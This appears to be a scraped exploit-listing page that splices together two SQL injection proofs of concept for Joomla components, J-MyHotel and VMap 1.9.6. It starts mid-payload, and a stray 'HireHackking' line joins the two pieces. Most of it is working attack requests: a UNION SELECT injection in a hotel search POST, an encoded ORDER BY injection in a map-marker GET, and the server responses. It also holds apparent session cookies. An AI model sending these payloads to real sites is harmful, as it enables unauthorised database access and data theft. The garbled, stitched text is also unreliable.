31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d

POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 985
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 15:14:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 23 Jan 2019 15:14:32 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49d9d658025e22c4-LAX
HireHackking 
# Exploit Title: Joomla! Component VMap 1.9.6 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/
# Version: 1.9.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=[SQL]&mapid=1
# 

GET /[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked